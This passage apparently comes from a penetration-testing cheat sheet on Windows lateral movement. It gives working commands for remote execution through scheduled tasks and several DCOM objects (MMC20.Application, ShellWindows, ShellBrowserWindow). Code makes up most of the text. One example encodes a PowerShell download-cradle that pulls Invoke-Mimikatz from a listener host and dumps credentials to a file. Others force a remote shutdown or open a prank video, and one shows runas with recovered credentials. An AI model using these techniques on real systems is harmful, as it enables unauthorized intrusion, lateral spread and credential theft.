Tasks, that are, scheduled. In addition to running commands locally, the built-in schtasks utility leverages RPC/DCOM to schedule tasks on remote machines. On legacy Windows machines, at.exe performed this functionality, but it was deprecated in favor of schtasks on modern platforms. Application firewalls that block schtasks may still allow at, a good reason to attempt both if necessary.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: schtasks, at

Examples:

  • schtasks.exe /Create /S 192.168.112.200 /U testlab\josh /P Password1 /TR "C:\Windows\System32\win32calc.exe" /TN "pwnd" /SC ONCE /ST 20:05
  • at.exe \\192.168.112.200 20:25 cmd /c "C:\Windows\System32\win32calc.exe"

Microsoft Management Console (MMC2.0) Application Class

In 2017, Matt Nelson released research into methods for lateral movement using DCOM. We strongly urge you to review his research for full details (it's worth the read). Reviewing all the intricacies of DCOM is outside the scope of what can/should be covered in a "cheat sheet", but suffice it to say the MMC2.0 application class can be accessed remotely over RPC/DCOM and exports the ExecuteShellCommand method, which can be used to... Execute... a... Shell... Command.

MMC requires local admin due to the nature of the application and will be blocked by the default firewall rules. BUT, we've seen enough networks that disable host firewalls to make good use of this technique.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows

Example code execution:

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.112.200"))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,"7")


Example Invoke-Mimikatz (listener started on 192.168.112.132:8000):

PS> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString('http://192.168.112.132:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:\\Users\\josh\\Desktop\\mimi.txt"))

PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.112.200"))
PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQAyAC4AMQAzADIAOgA4ADAAMAAwAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAD4AIABDADoAXABcAFUAcwBlAHIAcwBcAFwAagBvAHMAaABcAFwARABlAHMAawB0AG8AcABcAFwAbQBpAG0AaQAuAHQAeAB0AA==","7")

ShellWindows Object

A few weeks after his initial research on MMC lateral movement, Matt Nelson published more research targeting DCOM objects that lacked an explicit LaunchPermission attribute. Read his post here for a thorough review of the techniques shown below.

Successful auth over RPC is required; however, regardless of privilege, the code will execute as a child of the explorer.exe process with limited privileges. No scraping memory directly with this method... :(

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows


When invoking .NET calls in this fashion, the existing auth token is used. That's great for lateral movement from a compromised system, but not if you are remotely accessing a target machine with recovered credentials. The simplest method we have found is to create a new PS session with runas.

Example auth:

PS> runas /netonly /user:TESTLAB\josh "powershell.exe"


Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)


Example: call shutdown routine (user prompted for confirmation):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShutDownWindows()


Example troll: launch IE with Sloths in Space (10 hours):

PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $item = $obj.Item()
PS> $item.Document.Application.ShellExecute("iexplore.exe","https://www.youtube.com/watch?v=AaxQhNBBSkM","C:\Program Files\Internet Explorer",$null,"1")

ShellBrowserWindow Object

Functionally the same as the previous method, the ShellBrowserWindow object can be leveraged for remote code execution over DCOM.

Port: 135/TCP (RPC), plus one high-random TCP (DCOM)

Tools: native .NET calls on Windows


As with the ShellWindows object, the existing auth token is used when invoking these .NET calls. If you are working with recovered credentials rather than moving laterally from a compromised system, create a new PS session with runas /netonly as shown above.


Example code execution:

PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.112.200")
PS> $obj = [System.Activator]::CreateInstance($com)
PS> $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)